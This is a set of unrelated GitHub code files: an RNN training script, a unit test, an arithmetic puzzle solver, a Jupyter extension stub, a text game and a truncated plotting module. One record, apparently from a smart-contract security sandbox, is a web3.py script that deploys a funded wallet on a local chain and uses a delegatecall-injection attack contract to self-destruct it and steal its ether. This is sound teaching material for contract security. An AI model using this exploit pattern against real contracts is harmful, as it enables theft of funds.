self.hidden_dim))\r\n\t\ts[-1] = np.zeros(self.hidden_dim)\r\n\t\t\r\n\t\to = np.zeros((T, self.word_dim))\r\n\t\t# Compute o and s using the formulas\r\n\t\t# s[t] = tanh(U.x[t] + W.s[t-1])\r\n\t\t# o[t] = softmax(V.s[t])\r\n\t\tfor t in np.arange(T):\r\n\t\t \r\n\t\t\ts[t] = np.tanh(self.U[:,x[t]] + self.W.dot(s[t-1]))\r\n\t\t\to[t] = softmax(self.V.dot(s[t]))\r\n\t\treturn [o, s]\r\n \r\n\t\r\n\tdef predict(self, x):\r\n\t\t# Run forward propagation with the trained values of U, V, W to predict the result \r\n\t\to, s = 
self.forward_propagation(x)\r\n\t\ty_pre = np.argmax(o, axis=1) + 1\t\t \r\n\t\treturn y_pre[len(y_pre)-1] \r\n\r\n\r\n\tdef calculate_total_loss(self, x, y):\r\n\t#Compute the cross-entropy loss\t\t\t\t\r\n\t\to, s = self.forward_propagation(x)\r\n\t\t#Create one-hot vectors\r\n\t\ty_temp = to_categorical(y, num_classes=5)\r\n\t\ty_temp = np.delete(y_temp,0,1)\r\n\t\t\r\n\t\tE = (- np.mean(np.sum(y_temp * np.log(o), axis=1)))\r\n\t\t\r\n\t\treturn E \r\n\r\n\r\n\tdef bptt(self, x, y):\r\n\t#Backpropagation through time\r\n\t T = len(y)\r\n\t # Forward propagation\r\n\t o, s = self.forward_propagation(x)\r\n\t # Gradients of the loss with respect to U, V, W\r\n\t dEdU = np.zeros(self.U.shape)\r\n\t dEdV = np.zeros(self.V.shape)\r\n\t dEdW = np.zeros(self.W.shape)\r\n\t delta_o = o\r\n\t \r\n\t delta_o[np.arange(len(y)), y-1] -= 1\t \r\n\t \r\n\t # For each backward step\r\n\t for t in np.arange(T)[::-1]:\r\n\t dEdV += np.outer(delta_o[t], s[t].T)\r\n\t # Initialize delta_t\r\n\t delta_t = self.V.T.dot(delta_o[t]) * (1 - (s[t] ** 2))\r\n\t # Backpropagation through time over the chain of preceding steps \r\n\t for bptt_step in np.arange(max(0, t-self.bptt_truncate), t+1)[::-1]:\t \r\n\t dEdW += np.outer(delta_t, s[bptt_step-1]) \r\n\t dEdU[:,x[bptt_step]] += delta_t\r\n\t # update for the next step back\r\n\t delta_t = self.W.T.dot(delta_t) * (1 - s[bptt_step-1] ** 2)\r\n\t return [dEdU, dEdV, dEdW]\r\n \t \r\n\t\r\n\r\n\tdef numpy_sgd_step(self, x, y, learning_rate):\r\n\t\t# compute the gradients of the loss\r\n\t\tdEdU, dEdV, dEdW = self.bptt(x, y)\r\n\t\t# Update the weights along the gradients\r\n\t\tself.U -= learning_rate * dEdU\r\n\t\tself.V -= learning_rate * dEdV\r\n\t\tself.W -= learning_rate * dEdW\r\n\r\n\t\r\n# SGD Loop\r\n# - model: RNN model \r\n# - X_train: training data set\r\n# - y_train: training data labels\r\n# - learning_rate: initial learning rate for SGD\r\n# - nepoch: number of epochs\r\n# - evaluate_loss_after: evaluate the loss every k epochs\r\ndef train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=100, evaluate_loss_after=1):\r\n # Track the losses\r\n losses = []\r\n num_examples_seen = 0\r\n for epoch in range(nepoch):\r\n \r\n if (epoch % evaluate_loss_after == 0):\r\n loss = model.calculate_total_loss(X_train, y_train) \r\n losses.append(loss)\r\n \r\n #Lower the learning rate if the loss increases\r\n if (len(losses) > 1 and losses[-1]> losses[-2]):\r\n learning_rate = learning_rate * 0.75 \r\n print (\"Setting learning rate to %f\" % learning_rate)\r\n sys.stdout.flush()\r\n \r\n # One SGD step\r\n model.numpy_sgd_step(X_train, y_train, learning_rate)\r\n num_examples_seen += 1 \r\n \r\n return losses\r\n\r\ndef softmax(x):\r\n#Softmax function\r\n xt = np.exp(x - np.max(x))\r\n return xt / np.sum(xt)","repo_name":"luonghuuphuloc/artificial-inteligence-in-control","sub_path":"Recurrent-neural-network/RNN_BPTT/RNN_backpropagation.py","file_name":"RNN_backpropagation.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30502467650","text":"from test.utils import describe, it\nfrom unittest import TestCase, mock\n\nfrom src.adapter.local_file import LocalFileAdapter\n\n\nclass LocalFileTestCase(TestCase):\n @mock.patch(\n \"src.adapter.local_file.open\",\n new=mock.mock_open(read_data=\"filecontent\"),\n )\n @mock.patch(\"src.adapter.local_file.BytesIO\")\n @mock.patch(\"src.adapter.local_file.os\")\n @describe\n def test_uri(self, mock_os, mock_bytesio):\n @it\n def raises_if_the_input_is_not_dir():\n 
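The RNN record above implements the Elman recurrence s[t] = tanh(U.x[t] + W.s[t-1]), o[t] = softmax(V.s[t]) with truncated BPTT. A minimal sketch of driving that class on toy data (hypothetical sizes and inputs; it assumes keras's to_categorical is available as imported in the record, and note that calculate_total_loss one-hot encodes y with num_classes=5 and drops column 0, so word_dim must be 4 and targets must lie in 1..4):

import numpy as np

np.random.seed(0)
model = RNN_func(word_dim=4, hidden_dim=4, bptt_truncate=4)

X_train = np.array([0, 3, 2, 1, 3])   # input symbol indices in 0..3
y_train = np.array([1, 2, 3, 4, 2])   # target classes in 1..4

o, s = model.forward_propagation(X_train)
print(o.shape, s.shape)               # (5, 4) outputs, (5, 4) hidden states

losses = train_with_sgd(model, X_train, y_train, learning_rate=0.01, nepoch=20)
print("final loss:", losses[-1], "prediction:", model.predict(X_train))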
mock_os.path.isfile.return_value = False\n self.assertRaises(\n ValueError, LocalFileAdapter.load, *[\"./an-image\"]\n )\n\n mock_os.path.isfile.return_value = True\n mock_bytesio.return_value = \"some bytes\"\n\n @it\n def loads_a_remote_image():\n result = LocalFileAdapter.load(\"file.jpg\")\n mock_bytesio.assert_called_with(\"filecontent\")\n self.assertEqual(\"some bytes\", result)\n\n @it\n def does_not_load_a_file_with_invalid_extension():\n result = LocalFileAdapter.load(\"file.txt\")\n self.assertEqual(None, result)\n","repo_name":"melnyczuk/supercollager","sub_path":"test/unit/adapter/local_file_test.py","file_name":"local_file_test.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26710971899","text":"# the extension solver of the 4 = 10 problem\n\"\"\"three or more numbers and operators, goal are given,\n this solver finds the formula that results goal\"\"\"\n \n# MAINTENANCE IS CONSIDERED\n\nfrom operator import truediv\nfrom itertools import permutations, product \n\n############################################\n############# MODIFY HERE ##################\n############################################\n \nnumbers = [3, 4, 7, 8] \noperators = ['+', '-', '*', '/'] \ngoal = 10 \nbracket = False \n \n############################################\n############################################\n############################################\n\n\ndef FindBrackPos(n) :\n tmpPos = []\n for i in range(0, 2 * n - 3, 2) :\n for j in range(2, 2 * n + 1, 2) :\n if j - i > 2 and j - i != 2*n:\n tmpPos.append((i, j))\n return tmpPos\n\n\ndef Solver(nums, opers, goal, bracket=True) :\n n = len(nums)\n brackPos = FindBrackPos(n)\n numList = list(set(permutations(nums, n)))\n operitem = []\n for _ in range(n - 1) :\n operitem.append(opers)\n operitem.append([\"\"])\n operList = list(product(*operitem))\n \n for i in numList :\n for j in operList :\n form = \"\"\n for k in range(n) : form += str(i[k]) + j[k]\n \n try :\n if abs(eval(form) - goal) < 0.01 : print(form)\n except ZeroDivisionError : continue\n \n if bracket : \n for k in brackPos :\n tmpform = form[0:k[0]] + \"(\" + form[k[0]:k[1]-1] + \")\" + form[k[1]-1:2*n+1] \n try :\n if abs(eval(tmpform) - goal) < 0.01 : print(tmpform)\n except ZeroDivisionError : continue \n\nSolver(numbers, operators, goal, bracket)\n","repo_name":"Jenix8/4equal10-Solver","sub_path":"n=m.py","file_name":"n=m.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7965408400","text":"from web3 import Web3\nfrom web3 import contract as c\n\nfrom solcx import compile_files\n\n\ndef get_contract_abi_bin(contract_file):\n\n compiled_sol = compile_files( contract_file,\n output_values=['abi', 'bin']\n )\n return compiled_sol\n\ndef deploy_contract(abi, bin, target_address = None):\n\n Contract = w3.eth.contract(abi=abi, bytecode=bin)\n if(target_address == None):\n #DEPLOY WALLET WITH 50 Ether\n contract_type = \"WALLET\"\n tx_hash = Contract.constructor().transact({'gasPrice': w3.eth.gas_price,'value': 50000000000000000000})\n else:\n #ELSE DEPLOY ATTACK CONTRACT\n contract_type = \"ATTACKER\"\n tx_hash = Contract.constructor(target_address).transact()\n tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)\n contract = w3.eth.contract(\n address=tx_receipt.contractAddress,\n abi=abi\n )\n print(f\"{contract_type} CONTRACT DEPLOY WITH ADDRESS: 
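A quick way to sanity-check the 4 = 10 solver above: a formula over n numbers is a string of 2n-1 characters, so FindBrackPos enumerates even (start, end) slots for a single bracket pair. A small sketch on the classic 1-1-5-8 puzzle (inputs are hypothetical; only the functions defined above are used):

# FindBrackPos(4) yields slots such as (0, 4), which turns "a+b*c/d" into "(a+b)*c/d".
print(FindBrackPos(4))

# Make 10 from 1, 1, 5, 8: the solver should print 8/(1-1/5) among its hits.
Solver([1, 1, 5, 8], ['+', '-', '*', '/'], 10, bracket=True)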
{contract.address}\")\n return contract\n\n#### CONNECT WEB3PY TO GANACHE\nw3 = Web3(Web3.HTTPProvider('http://127.0.0.1:8545'))\naccounts = w3.eth.accounts\n\nw3.eth.default_account = accounts[0]\n\ncompiled_contracts = get_contract_abi_bin(\"./WalletSelfDestructableByAnyone.sol\")\n\nfor ctr in compiled_contracts:\n\n if(ctr == 'WalletSelfDestructableByAnyone.sol:Attack'):\n attack_abi_bin = (compiled_contracts[ctr]['abi'], compiled_contracts[ctr]['bin'])\n\n if(ctr == 'WalletSelfDestructableByAnyone.sol:Wallet'):\n wallet_abi_bin = (compiled_contracts[ctr]['abi'], compiled_contracts[ctr]['bin'])\n\n\n##### DEPLOY WALLET WITH ACCOUNT 0\nwallet = deploy_contract(wallet_abi_bin[0], wallet_abi_bin[1])\nwallet = c.ImplicitContract(wallet)\n\n##### DEPLOY ATTACK WITH ACCOUNT 1\nw3.eth.default_account = accounts[1]\nattack_init_balance = w3.eth.get_balance(accounts[1])\nattack = deploy_contract(attack_abi_bin[0], attack_abi_bin[1], wallet.address)\n\nattack_address = attack.address\n\ntry:\n wallet.delegateCallToAnotherContract(attack_address)\nexcept Exception as e:\n print(e)\n print(\"Not owner.\")\n exit(0)\n\nstolen_ether = w3.eth.get_balance(accounts[1])-attack_init_balance\nstolen_ether = w3.fromWei(stolen_ether, 'ether')\nprint(f\"\\nAttacker was able to self destruct and steal {stolen_ether} from Wallet: {wallet.address}\")\n \n\n","repo_name":"jcrreis/solidity-tools-sandbox","sub_path":"Examples/DelegateCallInjection/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10839466183","text":"\"\"\"\nNBScratch: Jupyter Notebook Extension placing a computational scratchpad in the\nnotebook\n\"\"\"\n\nimport os\nimport json\nimport datetime\n\nfrom notebook.utils import url_path_join\nfrom notebook.base.handlers import IPythonHandler, path_regex\n\nclass NBScratchHandler(IPythonHandler):\n\n # manage connections to various sqlite databases\n db_manager_directory = {}\n\n # check if extension loaded by visiting http://localhost:8888/api/nbscratch\n def get(self, path=''):\n \"\"\"\n Handle GET request\n \"\"\"\n\n html = \"

NBScratch is working

\"\n self.write(html)\n\n def post(self, path=''):\n \"\"\"\n Handle POST request\n \"\"\"\n\n print(\"Just got the NBScratch POST request\")\n # datetime objects are not JSON-serializable, so send an ISO string\n self.finish(json.dumps({'time': datetime.datetime.now().isoformat()}))\n\ndef _jupyter_server_extension_paths():\n \"\"\"\n Jupyter server configuration\n returns dictionary with where to find server extension files\n \"\"\"\n return [{\n \"module\": \"nbscratch\"\n }]\n\ndef _jupyter_nbextension_paths():\n \"\"\"\n Jupyter nbextension configuration\n returns dictionary with where to find nbextension files\n \"\"\"\n return [dict(\n section=\"notebook\",\n # the path is relative to the `nbscratch` directory\n src=\"static\",\n # directory in the `nbscratch/` namespace\n dest=\"nbscratch\",\n # _also_ in the `nbscratch/` namespace\n require=\"nbscratch/main\")]\n\ndef load_jupyter_server_extension(nb_app):\n \"\"\"\n Load the server extension and set up routing to proper handler\n nb_app: (obj) Jupyter Notebook Application\n \"\"\"\n\n nb_app.log.info('NBScratch Server extension loaded')\n web_app = nb_app.web_app\n host_pattern = '.*$'\n route_pattern = url_path_join(web_app.settings['base_url'],\n r\"/api/nbscratch%s\" % path_regex)\n web_app.add_handlers(host_pattern, [(route_pattern, NBScratchHandler)])\n","repo_name":"acrule/nbscratch","sub_path":"nbscratch/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70027269552","text":"Boss = False\nYou = 5\nEnemy = 5\nBoss_hp = 10\n\nwhile Enemy == 5:\n print(\"Enemy still stands\")\n Attack = int(input(\"Please choose a number: \"))\n\n if Attack >= 5:\n print(\"You defeated it!\")\n Enemy = 0\n break\n\n elif Attack <= 5:\n print(\"You did not do enough damage.\")\n\nif Enemy == 0:\n Boss = True\n\nwhile Boss == True:\n print(\"The boss stands before you\")\n Attack = int(input(\"Please choose a number: \"))\n\n if Attack >= 10:\n print(\"The boss falls\")\n print(\"Congratulations!\")\n break\n\n elif Attack <= 10:\n print(\"the boss survives and counters! 
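Once the nbscratch extension above is installed and enabled, the handler can be smoke-tested from outside the notebook. A hedged sketch with requests (the port and token depend on how your Jupyter server was launched; the token value here is a placeholder):

import requests

# Assumes a notebook server at localhost:8888; supply the auth token that
# Jupyter printed at startup if your server requires one.
resp = requests.get("http://localhost:8888/api/nbscratch",
                    params={"token": "<your-token>"})
print(resp.status_code)     # 200 when the extension is routed correctly
print(resp.text)            # should contain "NBScratch is working"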
Deals 3 damage!\")\n You = You - 3\n\n if You <= 0:\n print(\"YOU DIED\")\n exit()\n\n\n\n\n","repo_name":"Blackisrafil/testproject","sub_path":"practice projects/Def practice.py","file_name":"Def practice.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35407448783","text":"import numpy as np\r\nimport pandas as pd\r\nfrom pandas import Grouper\r\nfrom data.nn_data.datasets.truck_dataset import TruckDataSet\r\nfrom data.nn_data.instance_segmentation_data import InstanceSegmentationData\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom pathlib import Path\r\n\r\nfrom data.user_data.eye_data import EyeData\r\nfrom data.user_data.hand_data import HandData\r\nfrom data.user_data.head_data import HeadData\r\nfrom math_helper.math_helper import MathHelper\r\nimport constants\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn.preprocessing import LabelBinarizer\r\nfrom sklearn.metrics import roc_curve, auc, RocCurveDisplay, roc_auc_score, confusion_matrix, ConfusionMatrixDisplay\r\n\r\nfrom itertools import cycle\r\n\r\n\r\nclass Visualizer():\r\n\r\n def __init__(self) -> None:\r\n pass\r\n\r\n def visualize_head_data(self,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n head_labels: list[list[str]]) -> None:\r\n\r\n first_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 1]\r\n second_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 2]\r\n third_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 3]\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection='3d')\r\n index = 0\r\n image_index = 0\r\n\r\n x_label = \"x - coord\"\r\n x_range = [-1, 1]\r\n y_label = \"y - coord\"\r\n y_range = [-1, 1]\r\n z_label = \"z - coord\"\r\n z_range = [-1, 1]\r\n\r\n labels = [\"FirstIntention\", \"SecondIntention\", \"ThirdIntention\"]\r\n marker = ['o', 'o', 'o']\r\n colors = [\"aqua\", \"fuchsia\", \"lawngreen\"]\r\n marker_size = 1\r\n\r\n ax.scatter(first_intention[head_labels[0][0]], first_intention[head_labels[0][2]], first_intention[head_labels[0][1]],\r\n marker=marker[0],\r\n s=marker_size,\r\n color=colors[0],\r\n label=labels[0])\r\n \r\n ax.scatter(second_intention[head_labels[0][0]], second_intention[head_labels[0][2]], second_intention[head_labels[0][1]],\r\n marker=marker[1],\r\n s=marker_size,\r\n color=colors[1],\r\n label=labels[1])\r\n \r\n ax.scatter(third_intention[head_labels[0][0]], third_intention[head_labels[0][2]], third_intention[head_labels[0][1]],\r\n marker=marker[2],\r\n s=marker_size,\r\n color=colors[2],\r\n label=labels[2])\r\n\r\n ax.set_xlabel(x_label)\r\n ax.set_xlim(x_range)\r\n ax.set_ylabel(z_label)\r\n ax.set_ylim(z_range)\r\n ax.set_zlabel(y_label)\r\n ax.set_zlim(y_range)\r\n plt.title(f\"Head data from one user\")\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + \"AllUsers/Head\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n \r\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\r\n fancybox=True, shadow=True, ncol=4)\r\n plt.show()\r\n plt.savefig(path + \"/\" + f\"HeadData.png\")\r\n plt.close()\r\n\r\n def visualize_all_2d_positions_screen_space(self,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n position_labels: list[list[str]],\r\n user_name: str,\r\n intention: str,\r\n 
marker: list[str] = ['o', 'x', 'x'],\r\n visualize_bursts: bool = True,\r\n step_size: int = 5,\r\n offset: int = 0,\r\n colors: list[str] = ['b', 'g', 'r'],\r\n visualize_3d: bool = True,\r\n burst_size: int = constants.SLIDING_WINDOW_SIZE) -> None:\r\n\r\n labels = [\"Eye\", \"Right Hand\", \"Left Hand\"]\r\n\r\n index = 0\r\n image_index = 0\r\n while ((index + burst_size) < df_tracking_data_preprocessed.shape[0]):\r\n\r\n if visualize_3d:\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection='3d')\r\n\r\n for position_label_index, position_label in enumerate(position_labels):\r\n\r\n positions = df_tracking_data_preprocessed[position_label].to_numpy()\r\n\r\n correct_x_positions = np.logical_and(positions[:, 0] >= -1, positions[:, 0] <= 1)\r\n correct_y_positions = np.logical_and(positions[:, 1] >= -1, positions[:, 1] <= 1)\r\n correct_positions = np.logical_and(correct_x_positions, correct_y_positions)\r\n\r\n\r\n positions = positions[correct_positions]\r\n # we ignore the very first and very last samples\r\n positions = positions[offset:-offset]\r\n if (positions.shape[0] == 0):\r\n continue\r\n position_x = positions[:, 0]\r\n position_y = positions[:, 1]\r\n\r\n from_index = index\r\n to_index = from_index + burst_size\r\n burst_position_x = position_x[from_index:to_index]\r\n burst_position_y = position_y[from_index:to_index]\r\n\r\n # here go from screen space to NDC\r\n burst_position_x = ((burst_position_x + 1) / 2) * constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X\r\n burst_position_y = ((burst_position_y + 1) / 2) * constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y\r\n\r\n x_label = \"x - coord\"\r\n x_range = [0, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X]\r\n y_label = \"y - coord\"\r\n y_range = [0, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y]\r\n\r\n if visualize_3d:\r\n\r\n time_axis = np.arange(len(burst_position_x))\r\n\r\n ax.scatter(burst_position_x, time_axis, burst_position_y,\r\n marker=marker[position_label_index],\r\n color=colors[position_label_index],\r\n label=labels[position_label_index])\r\n\r\n ax.set_xlabel(x_label)\r\n ax.set_xlim(x_range)\r\n ax.set_ylabel(\"time\")\r\n # ax.set_ylim(y_range)\r\n ax.set_zlabel(y_label)\r\n ax.set_zlim(y_range)\r\n plt.title(f\"User data with {intention} over #{burst_size} samples burst\")\r\n\r\n else:\r\n \r\n plt.title(f\"Accumulated user data with {intention} over #{burst_size} samples burst\")\r\n plt.xlabel(x_label)\r\n plt.ylabel(y_label)\r\n plt.xlim(x_range)\r\n plt.ylim(y_range)\r\n plt.scatter(burst_position_x, burst_position_y,\r\n marker=marker[position_label_index],\r\n color=colors[position_label_index],\r\n label=labels[position_label_index])\r\n\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + user_name + \"/\" + intention + \"/\" + \"Bursts\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n \r\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\r\n fancybox=True, shadow=True, ncol=4)\r\n plt.savefig(path + \"/\" + f\"Accumulated user data from {user_name} with intention {intention} burst {image_index}.png\")\r\n plt.close()\r\n index += step_size\r\n image_index += 1\r\n\r\n def compare_different_burst_sizes(self,\r\n different_burst_sizes) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n x = []\r\n y = []\r\n for index in range(len(different_burst_sizes)):\r\n x.append(different_burst_sizes[index][0])\r\n y.append(different_burst_sizes[index][1][\"mean_test_balanced_accuracy\"])\r\n\r\n plt.title(\"Compare different burst 
sizes\")\r\n plt.plot(x, y, label='compare burst sizes')\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"BurstSizesCompare.png\")\r\n plt.close()\r\n\r\n\r\n\r\n def plot_losses(self, clf, burst_size: int) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n loss_curve = clf.best_estimator_[1].loss_curve_\r\n\r\n plt.title(\"Training losses\")\r\n plt.plot(loss_curve, label='losses')\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"Losses.png\")\r\n plt.close()\r\n\r\n def plot_accuracy(self, clf, burst_size: int) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n colors = [\"aqua\", \"darkorange\", \"cornflowerblue\", \"lawngreen\"]\r\n\r\n validation_scores = clf.best_estimator_[1].validation_scores_\r\n\r\n plt.plot(validation_scores, label='validation scores', color=colors[0])\r\n\r\n plt.title(\"Accuracy\")\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"Accuracy.png\")\r\n plt.close()\r\n\r\n\r\n def plot_confusion_matrix(self, clf, X_test, y_test, burst_size: int) -> None:\r\n\r\n predictions = clf.predict(X_test)\r\n cm = confusion_matrix(y_test, predictions, labels=clf.classes_)\r\n disp = ConfusionMatrixDisplay(confusion_matrix=cm,\r\n display_labels=clf.classes_)\r\n disp.plot()\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"ConfusionMatrix.png\")\r\n plt.close()\r\n\r\n\r\n def plot_all_OvR_ROC_curves(self, model, testX, testY,\r\n class_labels: list[str],\r\n label_binarizer,\r\n burst_size: int) -> None:\r\n\r\n y_score = model.predict_proba(testX)\r\n n_classes = 4\r\n\r\n fig, ax = plt.subplots(figsize=(6, 6))\r\n\r\n y_onehot_test = label_binarizer.transform(testY)\r\n\r\n fpr, tpr, roc_auc = dict(), dict(), dict()\r\n # Compute micro-average ROC curve and ROC area\r\n aux1 = testY.ravel()\r\n aux2 = y_score.ravel()\r\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_onehot_test.ravel(), y_score.ravel())\r\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\r\n\r\n plt.plot(\r\n fpr[\"micro\"],\r\n tpr[\"micro\"],\r\n label=f\"micro-average ROC curve (AUC = {roc_auc['micro']:.2f})\",\r\n color=\"deeppink\",\r\n linestyle=\":\",\r\n linewidth=4,\r\n )\r\n\r\n for i in range(n_classes):\r\n\r\n fpr[i], tpr[i], _ = roc_curve(y_onehot_test[:, i], y_score[:, i])\r\n roc_auc[i] = auc(fpr[i], tpr[i])\r\n\r\n fpr_grid = np.linspace(0.0, 1.0, 1000)\r\n\r\n # Interpolate all ROC curves at these points\r\n mean_tpr = np.zeros_like(fpr_grid)\r\n\r\n for i in range(n_classes):\r\n mean_tpr += np.interp(fpr_grid, fpr[i], tpr[i]) # linear interpolation\r\n\r\n # Average it and compute AUC\r\n mean_tpr /= n_classes\r\n\r\n fpr[\"macro\"] = fpr_grid\r\n tpr[\"macro\"] = mean_tpr\r\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\r\n\r\n plt.plot(\r\n fpr[\"macro\"],\r\n tpr[\"macro\"],\r\n label=f\"macro-average ROC curve (AUC = {roc_auc['macro']:.2f})\",\r\n color=\"navy\",\r\n linestyle=\":\",\r\n linewidth=4,\r\n )\r\n\r\n colors = cycle([\"aqua\", \"darkorange\", \"cornflowerblue\", \"lawngreen\"])\r\n for class_id, color in zip(range(n_classes), colors):\r\n RocCurveDisplay.from_predictions(\r\n testY,\r\n y_score[:, class_id],\r\n name=f\"{class_labels[class_id]} vs the rest\",\r\n 
color=color,\r\n pos_label=class_id,\r\n ax=ax,\r\n )\r\n\r\n plt.plot([0, 1], [0, 1], \"k--\", label=\"chance level (AUC = 0.5)\")\r\n plt.axis(\"square\")\r\n plt.xlabel(\"False Positive Rate\")\r\n plt.ylabel(\"True Positive Rate\")\r\n plt.title(\"One-vs-Rest ROC curves:\\n\")\r\n plt.legend()\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"One-vs-Rest ROC curves.png\")\r\n plt.close()\r\n\r\n\r\n def visualize_results(self,\r\n df_tracking_data_old: pd.DataFrame,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n eye_data: EyeData,\r\n in_or_out_labels_eye_hit_pos: list[str],\r\n hand_data: HandData,\r\n in_or_out_labels_hand_pos: list[str],\r\n head_data: HeadData,\r\n instance_segmentation_data: InstanceSegmentationData,\r\n masks: np.array,\r\n user_name: str,\r\n intention: str,\r\n columns=1,\r\n rows=1,\r\n max_number_of_batches=50) -> None:\r\n \"\"\"\r\n For data understanding and debugging purposes\r\n \"\"\"\r\n mask_columns_joined = instance_segmentation_data.get_joined_mask_columns()\r\n class_labels = instance_segmentation_data.get_class_labels()\r\n class_probs = instance_segmentation_data.get_prob_labels()\r\n\r\n eye_hit_Pos_screen_space = eye_data.get_new_position_labels()[0]\r\n right_index_tip_Pos_screen_space = hand_data.get_new_position_labels()[0]\r\n left_index_tip_Pos_screen_space = hand_data.get_new_position_labels()[1]\r\n\r\n matplotlib.use('Agg')\r\n\r\n # batch some masks together in some plot\r\n batch_size = (columns * rows)\r\n # iterate over time\r\n saved_fig = 0\r\n for u in range(masks.shape[1] // batch_size):\r\n\r\n plt.axis('off')\r\n fig, axs = plt.subplots(rows, columns, figsize=(15, 15), squeeze=False)\r\n\r\n dataset = TruckDataSet()\r\n labels = dataset.get_labels()\r\n\r\n # plot multiple time steps at once\r\n for i in range(0, rows):\r\n for j in range(0, columns):\r\n\r\n axs[i, j].invert_yaxis()\r\n # ax1 = fig.add_subplot(rows, columns, i)\r\n global_index = u * batch_size + (i * columns + j)\r\n\r\n img_count = 0\r\n\r\n # iterate over all mask of a time step\r\n for m in range(len(mask_columns_joined)):\r\n\r\n # all masks from the #m instance segmentation mask\r\n masks_of_segmentation_result_m = masks[m]\r\n class_labels_of_segmentation_result_m = df_tracking_data_old[class_labels[m]]\r\n class_probs_of_segmentation_result_m = df_tracking_data_old[class_probs[m]]\r\n\r\n if (labels[class_labels_of_segmentation_result_m[global_index]] != \"platform\"):\r\n continue\r\n\r\n img_count += 1\r\n\r\n eye_hit_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_eye_hit_pos[0][m]].iloc[global_index]\r\n right_index_tip_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_hand_pos[0][m]].iloc[global_index]\r\n left_index_tip_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_hand_pos[1][m]].iloc[global_index]\r\n\r\n window_shape = (constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X)\r\n torch_resized = F.interpolate(input=torch.from_numpy(masks_of_segmentation_result_m[global_index])[None, None], size=window_shape, mode='bilinear', align_corners=False)[0]\r\n img = axs[i, j].imshow(torch_resized[0].numpy(), origin='upper')\r\n\r\n if (img_count == 0):\r\n break\r\n\r\n plt.title(f\"Segmentation masks \\n with projected user data in screen space \\nt = {u}\", fontsize=20)\r\n plt.colorbar(img, ax=axs[i, j], orientation='horizontal')\r\n\r\n 
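The macro-average block in plot_all_OvR_ROC_curves above follows the standard recipe: resample every per-class ROC onto a common FPR grid with linear interpolation, average the TPRs, then take the AUC of the mean curve. The same idea in isolation, on hypothetical toy scores (scikit-learn and numpy only):

import numpy as np
from sklearn.metrics import roc_curve, auc

# Toy one-hot targets and predicted scores for 3 classes (made-up data).
y_onehot = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1], [1, 0, 0]])
scores = np.array([[0.7, 0.2, 0.1], [0.3, 0.5, 0.2],
                   [0.2, 0.3, 0.5], [0.6, 0.3, 0.1]])

fpr_grid = np.linspace(0.0, 1.0, 1000)
mean_tpr = np.zeros_like(fpr_grid)
for i in range(3):
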